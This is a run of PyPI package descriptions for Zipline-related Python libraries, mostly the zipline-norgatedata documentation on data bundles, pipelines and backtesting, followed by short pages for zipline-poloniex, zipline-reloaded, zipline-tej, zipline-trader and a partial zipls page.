stock_price_adjustment_setting=StockPriceAdjustmentType.TOTALRETURN,
end_session='now',
calendar_name='NYSE',
excluded_symbol_list=None,
```

register_norgatedata_futures_bundle has the following default parameters:

```python
end_session='now',
calendar_name='us_futures',
excluded_symbol_list=None,
```

```python
# EQUITIES BUNDLES

# Single stock bundle - AAPL from 1990 through 2018
register_norgatedata_equities_bundle(
    bundlename='norgatedata-aapl',
    symbol_list=['AAPL', '$SPXTR'],
    start_session='1990-01-01',
    end_session='2020-12-01',
)

# FANG stocks (Facebook, Amazon, Netflix, Google) - 2012-05-18 until now
# (is now really MANG!)
register_norgatedata_equities_bundle(
    bundlename='norgatedata-fang',
    symbol_list=['META', 'AMZN', 'NFLX', 'GOOGL', '$SPXTR'],
    start_session='2012-05-18',  # This is the date that FB (now META) first traded
)

# A small set of selected ETFs
register_norgatedata_equities_bundle(
    bundlename='norgatedata-selected-etfs',
    symbol_list=['SPY', 'GLD', 'USO', '$SPXTR'],
    start_session='2006-04-10',  # This is the USO first trading date
)

# S&P 500 Bundle for backtesting including all current & past constituents back to 1990
# and the S&P 500 Total Return index (useful for benchmarking and/or index trend filtering)
# (around 1800 securities)
register_norgatedata_equities_bundle(
    bundlename='norgatedata-sp500',
    symbol_list=['$SPXTR'],
    watchlists=['S&P 500 Current & Past'],
    start_session='1970-01-01',
)

# Russell 3000 bundle containing all current & past constituents back to 1990
# and the Russell 3000 Total Return Index (useful for benchmarking and/or index trend filtering)
# (about 11000 securities)
register_norgatedata_equities_bundle(
    bundlename='norgatedata-russell3000',
    watchlists=['Russell 3000 Current & Past'],
    symbol_list=['$RUATR'],
    start_session='1990-01-01',
)

# And now a watchlist excluding a given list of symbols
register_norgatedata_equities_bundle(
    bundlename='norgatedata-russell3000-exfroth',
    watchlists=['Russell 3000 Current & Past'],
    symbol_list=['$RUATR'],
    start_session='1990-01-01',
    excluded_symbol_list=['TSLA', 'AMZN', 'META', 'NFLX', 'GOOGL'],
)

# FUTURES BUNDLES

# Example bundle for all of the individual contracts from three futures markets:
# E-mini S&P 500, E-mini Nasdaq 100, E-mini Russell 2000,
# with $SPXTR added for benchmark reference
register_norgatedata_futures_bundle(
    bundlename='norgatedata-selected-index-futures',
    session_symbols=['ES', 'NQ', 'RTY'],
    symbol_list=['$SPXTR'],
    start_session='2000-01-01',
)
```

For more bundle examples, scroll down to "Books/publications that use Zipline, adapted for Norgate Data use" below and download the Trading Evolved examples.

To ingest a bundle:

```
zipline ingest -b <bundlename>
```

Benchmark against a symbol

To benchmark against an index, use set_benchmark within the initialize function.

```python
def initialize(context):
    set_benchmark(symbol('$SPXTR'))  # Note: $SPXTR must be included in the bundle
    # ...
```

Pipelines - accessing timeseries data

Timeseries data has been exposed through Zipline's Pipeline interface. During a backtest, the Pipelines will be calculated against all securities in the bundle.

The following Filter (i.e. boolean) pipelines are available: NorgateDataIndexConstituent, NorgateDataMajorExchangeListed, NorgateDataBlankCheckCompany, NorgateDataCapitalEvent, NorgateDataPaddingStatus.

The following Factor (i.e. float) pipelines are available: NorgateDataUnadjustedClose, NorgateDataDividendYield.

To incorporate these into your trading model, you need to import the relevant packages/methods:

```python
from zipline.pipeline import Pipeline
from zipline_norgatedata.pipelines import (
    NorgateDataIndexConstituent,
    NorgateDataDividendYield,
)
from zipline.api import order_target_percent, set_benchmark
```

It is recommended you put your pipeline construction in its own function:

```python
def make_pipeline():
    indexconstituent = NorgateDataIndexConstituent('S&P 1500')
    divyield = NorgateDataDividendYield()
    return Pipeline(
        columns={
            'NorgateDataIndexConstituent': indexconstituent,
            'NorgateDividendYield': divyield,
        },
        screen=indexconstituent,
    )
```

Incorporate this into your trading system by attaching it to your initialize method. Note: for better efficiency, use chunks=9999 or however many bars you are likely to need. This will save unnecessary access to the Norgate Data database.

```python
def initialize(context):
    set_benchmark(symbol('$SPXTR'))  # Note: $SPXTR must be included in the bundle
    attach_pipeline(make_pipeline(), 'norgatedata_pipeline', chunks=9999, eager=True)
    # ...
```

Now you can access the contents of the pipeline in before_trading_start and/or handle_data by using Zipline's pipeline_output method. For example, you could exit positions that are no longer in the current constituents:

```python
def before_trading_start(context, data):
    context.pipeline_data = pipeline_output('norgatedata_pipeline')
    # ... your code here ...

def handle_data(context, data):
    context.pipeline_data = pipeline_output('norgatedata_pipeline')
    current_constituents = context.pipeline_data.index
    # ... your code here ...

    # Exit positions not in the index today
    for asset in context.portfolio.positions:
        if asset not in current_constituents:
            order_target_percent(asset, 0.0)
    # ... your code here ...
```

Note: Access to historical index constituents requires a Norgate Data Stocks subscription at the Platinum or Diamond level.

Worked example backtesting S&P 500 Constituents back to 1990

This example comprises a backtest on the S&P 500, with a basic trend filter that is applied on the S&P 500 index ($SPX). The total return version of the index is also ingested ($SPXTR) for comparison purposes. Note: This requires a Norgate Data US Stocks subscription at the Platinum or Diamond level.

Create a bundle definition in extension.py as follows:

```python
from zipline_norgatedata import register_norgatedata_equities_bundle

register_norgatedata_equities_bundle(
    bundlename='norgatedata-sp500-backtest',
    symbol_list=['$SPX', '$SPXTR'],
    watchlists=['S&P 500 Current & Past'],
    start_session='1990-01-01',
)
```

Now, ingest that bundle into zipline:

```
zipline ingest -b norgatedata-sp500-backtest
```

Inside your trading system file, you'd incorporate the following code snippets:

```python
from zipline.pipeline import Pipeline
from zipline_norgatedata.pipelines import (
    NorgateDataIndexConstituent,
    NorgateDataDividendYield,
)
...

def make_pipeline():
    indexconstituent = NorgateDataIndexConstituent('S&P 500')
    return Pipeline(
        columns={'NorgateDataIndexConstituent': indexconstituent},
        screen=indexconstituent,
    )

def initialize(context):
    set_benchmark(symbol('$SPXTR'))  # Note: $SPXTR must be included in the bundle
    attach_pipeline(make_pipeline(), 'norgatedata_pipeline', chunks=9999, eager=True)
    # ... your code here ...

def before_trading_start(context, data):
    context.pipeline_data = pipeline_output('norgatedata_pipeline')
    # ... your code here ...

def handle_data(context, data):
    context.pipeline_data = pipeline_output('norgatedata_pipeline')
    current_constituents = context.pipeline_data.index
    # ... your code here ...

    # Exit positions not in the index today
    for asset in context.portfolio.positions:
        if asset not in context.assets:
            order_target_percent(asset, 0.0)
    # ...
```

Worked example backtesting E-Mini S&P 500 futures

This example creates a continuous contract of the E-Mini S&P 500 futures that trade on CME, rolled on volume.

Create a bundle definition in extension.py as follows:

```python
from zipline_norgatedata import register_norgatedata_futures_bundle

bundlename = 'norgatedata-es-futures'
session_symbols = ['ES']
symbol_list = ['$SPXTR']
start_session = '2000-01-01'

register_norgatedata_futures_bundle(bundlename, start_session, session_symbols=session_symbols)
```

Now, ingest that bundle into zipline:

```
zipline ingest -b norgatedata-es-futures
```

Inside your trading system file, you'd incorporate the following code snippets:

```python
def initialize(context):
    set_benchmark(symbol('$SPXTR'))  # Note: $SPXTR must be included in the bundle

    # Obtain market(s) directly from the bundle
    af = context.asset_finder
    markets = set([])  # a set eliminates dupes
    allcontracts = af.retrieve_futures_contracts(af.futures_sids)
    for contract in allcontracts:
        markets.add(allcontracts[contract].root_symbol)
    markets = list(markets)
    markets.sort()

    # Make a list of all continuations
    context.universe = [
        continuous_future(market, offset=0, roll='volume', adjustment='mul')
        for market in markets
    ]
    # ... your code here ...

def handle_data(context, data):
    # Get continuation data
    hist = data.history(
        context.universe,
        fields=['close', 'volume'],
        frequency='1d',
        bar_count=250,  # Adjust to whatever lookback period you need
    )
    # Now use hist in your calculations

    # Make a dictionary of open positions, based on the root symbol
    open_pos = {pos.root_symbol: pos for pos in context.portfolio.positions}

    contracts_to_trade = 5
    for continuation in context.universe:
        # ...
        contract = data.current(continuation, 'contract')
        # ...
        # Add your conditions here to determine if there is an entry, then...
        order_target(contract, contracts_to_trade)
        # Add your conditions to determine if there is an exit of a position, then...
        order_target(contract, -1 * contracts_to_trade)

    # Finally, if there are open positions check for rolls
    if len(open_pos) > 0:
        roll_futures(context, data)
```

Metadata

The following fields are available in the metadata dataframe: start_date, end_date, ac_date, symbol, asset_name, exchange, exchange_full, asset_type, norgate_data_symbol, norgate_data_assetid.

Norgate Data Futures Market Session symbols

To obtain just the futures market session symbols, you can use the norgatedata package and adapt the following code:

```python
import norgatedata

for session_symbol in norgatedata.futures_market_session_symbols():
    print(session_symbol + " " + norgatedata.futures_market_session_name(session_symbol))
```

Zipline Limitations/Quirks

Zipline 2.4 and v3 are hardcoded to ignore dates prior to 1990-01-01. This can be patched to 1970-01-01, but cannot go any further since Zipline uses the Unix Epoch (1970-01-01) as the underlying time storage mechanism.

Zipline doesn't define all futures markets and doesn't provide any runtime extensibility in this area - you will need to add them to <your_environment>\lib\site-packages\zipline\finance\constants.py if they are not defined. Be sure to back up this file as it will be overwritten any time you update zipline.

Zipline assumes that there are bars for every day of trading. If a security doesn't trade for a given day (e.g. it was halted/suspended, or simply nobody wanted to trade it), it will be padded with the previous close repeated in the OHLC fields, with volume set to zero.
Consider how this might affect your trading calculations.

Index volumes cannot be accurately ingested, because Zipline tries to convert large volumes to UINTs which are out of bounds for UINT32. Index volumes will be divided by 1000.

Any stock whose adjusted volume exceeds the upper bound of UINT32 will be set to the maximum UINT32 value (4294967295). This only occurs for stocks with a lot of splits and/or very large special distributions.

Some stocks have adjusted volume values that fall below the boundaries used by winsorize_uint32 (e.g. a volume of 8.225255e-05). You'll see a warning when those stocks are ingested: "UserWarning: Ignoring 12911 values because they are out of bounds for uint32". There's not much we can do here; for now, just ignore those warnings.

Ingestion times could be improved significantly with multiprocessing (this would require Zipline enhancements).

Zipline cannot handle negative prices (e.g. Crude Oil in 2020) - any such prices will be set to zero. Most systems would have rolled prior to this strange event anyway.

Testing on Australian ASX data

By default, run_algorithm uses the 'NYSE' trading calendar. To backtest other markets, you need to specify the calendar. For the ASX, the calendar name is XASX.

At the top of your algorithm:

```python
from exchange_calendars import get_calendar
```

In the run_algorithm call, add a trading_calendar= line, for example:

```python
results = run_algorithm(
    start=start,
    end=end,
    initialize=initialize,
    analyze=analyze,
    handle_data=handle_data,
    capital_base=10000,
    trading_calendar=get_calendar('XASX', start="1990-01-01"),
    data_frequency='daily',
    bundle='norgatedata-spasx200',
)
```

Testing on Canadian TSX data

By default, run_algorithm uses the 'NYSE' trading calendar. To backtest other markets, you need to specify the calendar. For the TSX, the calendar name is XTSE.

At the top of your algorithm:

```python
from trading_calendars import get_calendar
```

In the run_algorithm call, add a trading_calendar= line, for example:

```python
results = run_algorithm(
    start=start,
    end=end,
    initialize=initialize,
    analyze=analyze,
    handle_data=handle_data,
    capital_base=10000,
    trading_calendar=get_calendar('XTSE', start="1990-01-01"),
    data_frequency='daily',
    bundle='norgatedata-sptsx60',
)
```

Be sure to implement the trading_calendars patch mentioned above too.

Books/publications that use Zipline, adapted for Norgate Data use

We have adapted the Python code in the following books to use Norgate Data.

Trading Evolved: Anyone can Build Killer Trading Strategies in Python. Source code compatible with Zipline (Reloaded) v2.4, in Jupyter notebook format, can be downloaded here: https://norgatedata.com/book-examples/trading-evolved/NorgateDataTradingEvolvedExamples.zipline.300.zip

If there are other books/publications that use Zipline and are worth adding here, let us know.

FAQs

During a backtest I receive an error ValueError: 'Time Period' is not in list. How do I fix this?

This can occur when the items in the bundle do not match the latest data in the Norgate Data database. For stocks, if there are symbol changes within the database then the bundle will have the old symbol but the Norgate database will have the new symbol. For futures, there may have been additional futures contracts listed since your previous ingestion and the roll-over algorithm is trying to roll into them.

The solution is simple: ingest the bundle with fresh data. Also consider putting Norgate Data Updater into manual mode for updating, and using the NDU Trigger app to explicitly start NDU and obtain updates.
More information on this can be found here: https://norgatedata.com/ndu-usage.php

During a backtest, an error message is shown for index_constituent_timeseries

For example, an error such as this is shown:

```
[2023-06-05 07:39:25.720989] INFO: Norgate Data: Populating NorgateDataIndexConstituent pipeline populating with $DJI on 3638 securities from 2000-01-03 to 2023-06-02....
[2023-06-05 07:39:34.734116] ERROR: Norgate Data: index_constituent_timeseries: DBD not found
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
(lots of irrelevant trace messages thereafter)
```

The Norgate Data database has been updated since you last performed an ingest, and there have been some symbol changes. In the above example, since the ingest occurred, DBD has been demoted to OTC and has a new symbol of DBDQQ. The solution is simple: ingest the bundle with fresh data. Also consider putting Norgate Data Updater into manual mode for updating, and using the NDU Trigger app to explicitly start NDU and obtain updates. More information on this can be found here: https://norgatedata.com/ndu-usage.php

Change log

Released versions and release dates can be seen here: https://pypi.org/project/zipline-norgatedata/#history. The CHANGES.TXT within the package details the changes. A summary is also shown below.

Installing older versions

Older versions of Zipline-NorgateData can be installed easily using pip. For example, to install v2.0.17:

```
pip install zipline-norgatedata==2.0.17
```

Note that prior versions may only be suited to older versions of Zipline. However, due to the constantly evolving nature of Zipline, we can only really support the current version.

Support

For support on Norgate Data or usage of the zipline-norgatedata extension: Norgate Data support. Please put separate issues in separate emails, as this ensures each issue is separately ticketed and tracked. For bug reports on Zipline Reloaded, report them on Stefan Jansen's Zipline Reloaded Github. There is also a Google Group, which isn't used much these days: Zipline Google Group.

Thanks

Thanks to:

- Andreas Clenow, for his pioneering work in documenting Zipline bundles in his latest book Trading Evolved: Anyone can Build Killer Trading Strategies in Python. We used many of the techniques described in the book to build our bundle code. There are many excellent examples of how to implement various trading systems, including trend following, counter-trend following, momentum, curve trading and combining multiple trading systems together.
- Norgate Data alpha and beta testers. Without your persistence we wouldn't have implemented half of the features.
- The team formerly employed by Quantopian, for developing and open-sourcing Zipline.
- Stefan Jansen, Mehdi Bounouar, Allan Coppola, Shlomi Kushchi and many more, for continued development efforts on Zipline and associated packages since Quantopian ceased.

Recent Version History

v2.3.0 20220728 Bump to v2.3.0 due to version checking issue
v2.3.1 20221027 Added Mac M1/M2 workaround to docs
v2.3.2 20221114 Notes on Juneteenth holiday patch
v2.3.3 20230122 Notes on TSXFailures patch
v2.3.4 20230222 Update documentation to specify sqlalchemy<2
v2.4.0 20230506 Change to zipline-reloaded and pyfolio-reloaded via conda-forge
v2.4.1 20230507 Minor documentation fixes on installation method
v2.4.1 20230507 Documentation fixes
v2.4.2 20230507 Documentation fixes, revised Clenow scripts
v2.4.3 20230606 Revised information on extending backtests to 1970 by patching Zipline, better start/end session handling so that you don't have to be on an actual trading date
v2.4.4 20230709 Prevent TypeError: Cannot compare tz-naive and tz-aware timestamps on bundle ingest when normalizing start and end session dates
v3.0.0 20231005 Fix a few typos in the instructions, convert the deprecated Pandas fillna to ffill and bfill. Fully tested against Zipline v3. Added BlankCheckCompany pipeline
v3.0.1 20231005 Updated Trading Evolved scripts
v3.0.2 20240111 Added h5py to install instructions due to incorrect package dependency in conda-forge
v3.0.3 20240111 Docs
zipline-poloniex
Poloniex data bundle for zipline, the pythonic algorithmic trading library.

Description

Just install the data bundle with pip:

```bash
pip install zipline-poloniex
```

and create a file $HOME/.zipline/extension.py calling zipline's register function. The create_bundle function returns the necessary ingest function for register. Use the Pairs record for common US-Dollar to crypto-currency pairs.

Example

Add the following content to $HOME/.zipline/extension.py:

```python
import pandas as pd
from zipline_poloniex import create_bundle, Pairs, register

# adjust the following lines to your needs
start_session = pd.Timestamp('2016-01-01', tz='utc')
end_session = pd.Timestamp('2016-12-31', tz='utc')
assets = [Pairs.usdt_eth]

register(
    'poloniex',
    create_bundle(
        assets,
        start_session,
        end_session,
    ),
    calendar_name='POLONIEX',
    minutes_per_day=24 * 60,
    start_session=start_session,
    end_session=end_session,
)
```

Ingest the data with:

```bash
zipline ingest -b poloniex
```

Create your trading algorithm, e.g. my_algorithm.py, with:

```python
import logging

from zipline.api import order, record, symbol
from zipline_poloniex.utils import setup_logging

__author__ = "Florian Wilhelm"
__copyright__ = "Florian Wilhelm"
__license__ = "new-bsd"

# setup logging and all
setup_logging(logging.INFO)
_logger = logging.getLogger(__name__)
_logger.info("Dummy agent loaded")


def initialize(context):
    _logger.info("Initializing agent...")
    # There seems no "nice" way to set the emission rate to minute
    context.sim_params._emission_rate = 'minute'


def handle_data(context, data):
    _logger.debug("Handling data...")
    order(symbol('ETH'), 10)
    record(ETH=data.current(symbol('ETH'), 'price'))
```

Run your algorithm in my_algorithm.py with:

```bash
zipline run -f ./my_algorithm.py -s 2016-01-01 -e 2016-12-31 -o results.pickle --data-frequency minute -b poloniex
```

Analyze the performance by reading results.pickle with the help of Pandas.

Note

This project has been set up using PyScaffold 2.5.7. For details and usage information on PyScaffold see http://pyscaffold.readthedocs.org/.
zipline.py
Quickstart

```python
import asyncio
import zipline


async def main():
    async with zipline.Client("your_zipline_site.com", "your_zipline_token") as client:
        files = await client.get_all_files()
        for file in files:
            print(file.name)


asyncio.run(main())
```

Documentation available HERE.
zipline-reloaded
Backtest your Trading Strategies

Zipline is a Pythonic event-driven system for backtesting, developed and used as the backtesting and live-trading engine by crowd-sourced investment fund Quantopian. Since it closed late 2020, the domain that had hosted these docs expired. The library is used extensively in the book Machine Learning for Algorithmic Trading by Stefan Jansen, who is trying to keep the library up to date and available to his readers and the wider Python algotrading community.

Join our Community! | Documentation

Features

- Ease of Use: Zipline tries to get out of your way so that you can focus on algorithm development. See below for a code example.
- Batteries Included: many common statistics like moving average and linear regression can be readily accessed from within a user-written algorithm.
- PyData Integration: Input of historical data and output of performance statistics are based on Pandas DataFrames to integrate nicely into the existing PyData ecosystem.
- Statistics and Machine Learning Libraries: You can use libraries like matplotlib, scipy, statsmodels, and scikit-learn to support development, analysis, and visualization of state-of-the-art trading systems.

Note: Release 3.0 updates Zipline to use pandas >= 2.0 and SQLAlchemy > 2.0. These are major version updates that may break existing code; please review the linked docs.

Note: Release 2.4 updates Zipline to use exchange_calendars >= 4.2. This is a major version update and may break existing code (which we have tried to avoid but cannot guarantee). Please review the changes here.

Installation

Zipline supports Python >= 3.8 and is compatible with current versions of the relevant NumFOCUS libraries, including pandas and scikit-learn.

Using pip

If your system meets the pre-requisites described in the installation instructions, you can install Zipline using pip by running:

```bash
pip install zipline-reloaded
```

Using conda

If you are using the Anaconda or miniconda distributions, you can install zipline-reloaded from the channel conda-forge like so:

```bash
conda install -c conda-forge zipline-reloaded
```

You can also enable conda-forge by listing it in your .condarc. In case you are installing zipline-reloaded alongside other packages and encounter conflict errors, consider using mamba instead.

See the installation section of the docs for more detailed instructions and the corresponding conda-forge site.

Quickstart

See our getting started tutorial. The following code implements a simple dual moving average algorithm.

```python
from zipline.api import order_target, record, symbol


def initialize(context):
    context.i = 0
    context.asset = symbol('AAPL')


def handle_data(context, data):
    # Skip first 300 days to get full windows
    context.i += 1
    if context.i < 300:
        return

    # Compute averages
    # data.history() has to be called with the same params
    # from above and returns a pandas dataframe.
    short_mavg = data.history(context.asset, 'price', bar_count=100, frequency="1d").mean()
    long_mavg = data.history(context.asset, 'price', bar_count=300, frequency="1d").mean()

    # Trading logic
    if short_mavg > long_mavg:
        # order_target orders as many shares as needed to
        # achieve the desired number of shares.
        order_target(context.asset, 100)
    elif short_mavg < long_mavg:
        order_target(context.asset, 0)

    # Save values for later inspection
    record(AAPL=data.current(context.asset, 'price'),
           short_mavg=short_mavg,
           long_mavg=long_mavg)
```

You can then run this algorithm using the Zipline CLI. But first, you need to download some market data with historical prices and trading volumes:

```bash
$ zipline ingest -b quandl
$ zipline run -f dual_moving_average.py --start 2014-1-1 --end 2018-1-1 -o dma.pickle --no-benchmark
```

This will download asset pricing data sourced from Quandl (since the acquisition, hosted by NASDAQ), and stream it through the algorithm over the specified time range. Then, the resulting performance DataFrame is saved as dma.pickle, which you can load and analyze from Python. You can find other examples in the zipline/examples directory.

Questions, suggestions, bugs?

If you find a bug or have other questions about the library, feel free to open an issue and fill out the template.
zipline-tej
Installation

Used packages and environment
Main package: Zipline
Python 3.8 or above (currently supported up to 3.11)
Microsoft Windows, macOS, or Linux
Other Python dependency packages: Pandas, Numpy, Logbook, Exchange-calendars, etc.

How to install Zipline Reloaded modified by TEJ

We illustrate the setup under an Anaconda environment, so we suggest using Anaconda as the development environment.

Download the dependency packages: Windows (zipline-tej.yml) or Mac (zipline-tej_mac.yml).

Start an Anaconda (base) prompt, create a virtual environment and install the appropriate versions of the packages. (We strongly recommend using a virtual environment to keep every project independent.) (reason)

Windows Users

# change directory to the folder that contains zipline-tej.yml
$ cd <C:\Users\username\Downloads>

# create virtual env
$ conda env create -f zipline-tej.yml

# activate virtual env
$ conda activate zipline-tej

Mac Users

# change directory to the folder that contains zipline-tej_mac.yml
$ cd <C:\Users\username\Downloads>

# create virtual env
$ conda env create -f zipline-tej_mac.yml

# activate virtual env
$ conda activate zipline-tej

Also, if you are familiar enough with Python, you can create a virtual environment without zipline-tej.yml. Here is a sample:

# create virtual env
$ conda create -n <env_name> python=3.10

# activate virtual env
$ conda activate <env_name>

# download dependency packages
$ pip install zipline-tej

If you encounter environment problems, we provide a consistent and stable environment on Docker hub. For users working with Docker, here is a brief introduction to downloading and using it. First of all, please download and install docker-desktop.

1. Start docker-desktop. (Registration is not a must.)
2. Select "Images" on the left side, search "tej87681088/tquant" and click "Pull".
3. After the image is downloaded, click the "Run" icon and enter the optional settings.
3-1. Container name: whatever you want.
3-2. Ports: the port to connect to; "8888" is recommended.
3-3. Volumes: the place to store files. (You can create a volume first on the left side.) e.g. create a volume named "data", enter "data" as the host path; "/app" is recommended as the container path.
4. Select "Containers" on the left side, then click the one whose image name is tej87681088/tquant.
5. Its "Logs" will show a URL like http://127.0.0.1:8888/tree?token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
6. Go to your browser and enter "http://127.0.0.1:<port_you_set_in_step_3-2>/tree?token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
6-1. If your port is 8888, you can just click the hyperlink.
7. Start developing your strategy!
NOTICE: Next time, you only need to repeat steps 4 to 6.

Quick start

CLI Interface

The following code implements a simple buy-and-hold trading algorithm.

from zipline.api import order, record, symbol


def initialize(context):
    context.asset = symbol("2330")


def handle_data(context, data):
    order(context.asset, 10)
    record(TSMC=data.current(context.asset, "price"))


def analyze(context=None, results=None):
    import matplotlib.pyplot as plt

    # Plot the portfolio and asset data.
    ax1 = plt.subplot(211)
    results.portfolio_value.plot(ax=ax1)
    ax1.set_ylabel("Portfolio value (TWD)")
    ax2 = plt.subplot(212, sharex=ax1)
    results.TSMC.plot(ax=ax2)
    ax2.set_ylabel("TSMC price (TWD)")

    # Show the plot.
    plt.gcf().set_size_inches(18, 8)
    plt.show()

You can then run this algorithm using the Zipline CLI.
But first, you need to download some market data with historical prices and trading volumes. Before ingesting data, you have to set some environment variables as follows:

# setting TEJAPI_KEY to get permissions loading data
$ set TEJAPI_KEY=<your_key>
$ set TEJAPI_BASE=https://api.tej.com.tw

# setting download ticker
$ set ticker=2330 2317

# setting backtest period
$ set mdate=20200101 20220101

Ingest and run the backtesting algorithm:

$ zipline ingest -b tquant
$ zipline run -f buy_and_hold.py --start 20200101 --end 20220101 -o bah.pickle --no-benchmark --no-treasury

Then, the resulting performance DataFrame is saved as bah.pickle, which you can load and analyze from Python.

More useful zipline commands

Before calling zipline in the CLI, be sure that TEJAPI_KEY and TEJAPI_BASE are set. Use zipline --help to get more information. For example, to learn how to use zipline run, we can run:
[default: default] --help Show this message and exit.New add tickers$ zipline add -t "<ticker_wants_to_add>"If tickers are more than 1 ticker, split them apart by " " or "," or ";".For more detail usezipline add --help.Display bundle-info$ zipline bundle-infoTo show what the tickers are there in newest bundle.For more detail usezipline bundle-info --help.Switch bundleBefore using switch, usezipline bundlesto get the timestamp of each folder.$ zipline switch -t "<The_timestamp_of_the_folder_want_to_use>"Due to zipline only using the newest foler, switch can make previous folder become newest.For more detail usezipline switch --help.Update bundle$ zipline updateTo update the bundle information to newest date.For more detail usezipline update --help.Jupyter NotebookChange Anaconda kernelSince we've downloaded package "nb_conda_kernels", we should be able to change kernel in jupyter notebook.How to new a notebook using specific kernel(1) Open anaconda prompt(2) Enter the command as follow :# First one can be ignore if already in environment of zipline-tej $ conda activate zipline-tej # start a jupyter notebook $ jupyter notebook(3) Start a notebook and select Python[conda env:zipline-tej](4)(Optional) If you have already written a notebook, you can open it and change kernel by clicking the "Kernel" in menu and "Change kernel" to select the specfic kernel.Set environment variables TEJAPI_KEY, ticker and mdate* ticker would be your target ticker symbol, and it should be a string. If there're more than one ticker needed, use " ", "," or ";" to split them apart.* mdate refers the begin date and end date, use " ", "," or ";" to split them apart.In[1]:importosos.environ['TEJAPI_KEY']=<your_key>os.environ['ticker']='2330 2317'os.environ['mdate']='20200101 20220101'Call ingest to download data to ~\.ziplineIn[2]:!ziplineingest-btquant[Out]:Mergingdailyequityfiles:[YYYY-MM-DDHH:mm:ss.ssssss]INFO:zipline.data.bundles.core:Ingestingtquant.Design the backtesting strategyIn[3]:fromzipline.apiimportorder,record,symboldefinitialize(context):context.asset=symbol("2330")defhandle_data(context,data):order(context.asset,10)record(TSMC=data.current(context.asset,"price"))defanalyze(context=None,results=None):importmatplotlib.pyplotasplt# Plot the portfolio and asset data.ax1=plt.subplot(211)results.portfolio_value.plot(ax=ax1)ax1.set_ylabel("Portfolio value (TWD)")ax2=plt.subplot(212,sharex=ax1)results.TSMC.plot(ax=ax2)ax2.set_ylabel("TSMC price (TWD)")# Show the plot.plt.gcf().set_size_inches(18,8)plt.show()Run backtesting algorithm and plotIn[4]:fromziplineimportrun_algorithmimportpandasaspdfromzipline.utils.calendar_utilsimportget_calendartrading_calendar=get_calendar('TEJ_XTAI')start=pd.Timestamp('20200103',tz='utc')end=pd.Timestamp('20211230',tz='utc')result=run_algorithm(start=start,end=end,initialize=initialize,capital_base=1000000,handle_data=handle_data,bundle='tquant',trading_calendar=trading_calendar,analyze=analyze,data_frequency='daily')[Out]:Show trading processIn[5]:result[Out]:period_openperiod_closestarting_valueending_valuestarting_cashending_cashportfolio_valuelongs_countshorts_countlong_value...treasury_period_returntrading_daysperiod_labelalgo_volatilitybenchmark_period_returnbenchmark_volatilityalgorithm_period_returnalphabetasharpe2020-01-03 05:30:00+00:002020-01-03 01:01:00+00:002020-01-03 05:30:00+00:000.00.01.000000e+061.000000e+061.000000e+06000.0...0.012020-01NaN0.0NaN0.000000NoneNoneNaN2020-01-06 05:30:00+00:002020-01-06 01:01:00+00:002020-01-06 
05:30:00+00:000.03320.01.000000e+069.966783e+059.999983e+05103320.0...0.022020-010.0000190.00.0-0.000002NoneNone-11.2249722020-01-07 05:30:00+00:002020-01-07 01:01:00+00:002020-01-07 05:30:00+00:003320.06590.09.966783e+059.933817e+059.999717e+05106590.0...0.032020-010.0002370.00.0-0.000028NoneNone-10.0385142020-01-08 05:30:00+00:002020-01-08 01:01:00+00:002020-01-08 05:30:00+00:006590.09885.09.933817e+059.900850e+059.999700e+05109885.0...0.042020-010.0002030.00.0-0.000030NoneNone-9.2981282020-01-09 05:30:00+00:002020-01-09 01:01:00+00:002020-01-09 05:30:00+00:009885.013500.09.900850e+059.867083e+051.000208e+061013500.0...0.052020-010.0017540.00.00.000208NoneNone5.986418..................................................................2021-12-24 05:30:00+00:002021-12-24 01:01:00+00:002021-12-24 05:30:00+00:002920920.02917320.0-1.308854e+06-1.314897e+061.602423e+06102917320.0...0.04842021-120.2327910.00.00.602423NoneNone1.1707432021-12-27 05:30:00+00:002021-12-27 01:01:00+00:002021-12-27 05:30:00+00:002917320.02933040.0-1.314897e+06-1.320960e+061.612080e+06102933040.0...0.04852021-120.2325770.00.00.612080NoneNone1.1828642021-12-28 05:30:00+00:002021-12-28 01:01:00+00:002021-12-28 05:30:00+00:002933040.02982750.0-1.320960e+06-1.327113e+061.655637e+06102982750.0...0.04862021-120.2330860.00.00.655637NoneNone1.2379582021-12-29 05:30:00+00:002021-12-29 01:01:00+00:002021-12-29 05:30:00+00:002982750.02993760.0-1.327113e+06-1.333276e+061.660484e+06102993760.0...0.04872021-120.2328500.00.00.660484NoneNone1.2431762021-12-30 05:30:00+00:002021-12-30 01:01:00+00:002021-12-30 05:30:00+00:002993760.02995050.0-1.333276e+06-1.339430e+061.655620e+06102995050.0...0.04882021-120.2326290.00.00.655620NoneNone1.235305488 rows × 38 columnsMore Zipline TutorialsFor moretutorialsSuggestionsTo get TEJAPI_KEY(link)TEJ Official Website
zipline-trader
zipline-trader

Welcome to zipline-trader, the on-premise trading platform built on top of Quantopian's zipline. This project is meant to be used for backtesting/paper/live trading with one of the following brokers:

Interactive Brokers
Alpaca

Please Read The Docs, and you can find us on Slack.
zipload
No description available on PyPI.
zipls
A script to help you zip playlists.Homepage:http://bitbucket.org/quodlibetor/ziplsContentsInstallationUsageUsersGraphical UseCommand LineProgrammersExtendingWorks WithContact and CopyingInstallationTo make this work best you want to have pip (http://pypi.python.org/pypi/pip) installed, although technically it is possible to install it without it.From a terminal, (Terminal.app if you’re on a Mac, or whatever turns you on) after installing pip, do:sudo pip install argparse mutagen ziplsThat should do it. If it doesn’t, pleasecontactme.UsageUsersGraphical UseAfter installation there should be a programziplsthat you can run. Run it.That is to say that, in general, if you run zipls without any arguments it will give you a gui.If you run it from a command line with playlist files as arguments, you can give it the-gswitch to make it still run in graphical mode. All arguments given to the command line should still apply even if run in graphics mode.Command LineTypically:zipls PLAYLIST.plsthat’ll generate a zip file PLAYLIST.zip with a folder PLAYLIST inside of it with all the songs pointed to by PLAYLIST.pls.And of course:zipls --helpworks. (Did you think I was a jerk?)ProgrammersBasically all you care about is theSongsclass from zipls. It takes a path, or list of paths, to a playlist and knows how to zip them:from zipls import Songs songs = Songs("path/to/playlist.m3u") # __init__ just goes through add(): songs.add("path/to/another/playlist.xspf") # lists of paths also work: songs.add(['another.pls', 'something/else.m3u']) songs.zip_em('path/to/zipcollection')ExtendingFirst of all, just email me with an example of the playlist that you want zipls to parse and I’ll do it. But if you want tonotmonkey-patch it:If you want to add a new playlist format with extension EXT: subclassSongsand implement a function_songs_from_EXT(self, 'path/to/pls')that expects to receive a path to the playlist.Similarly, if you want to add audio 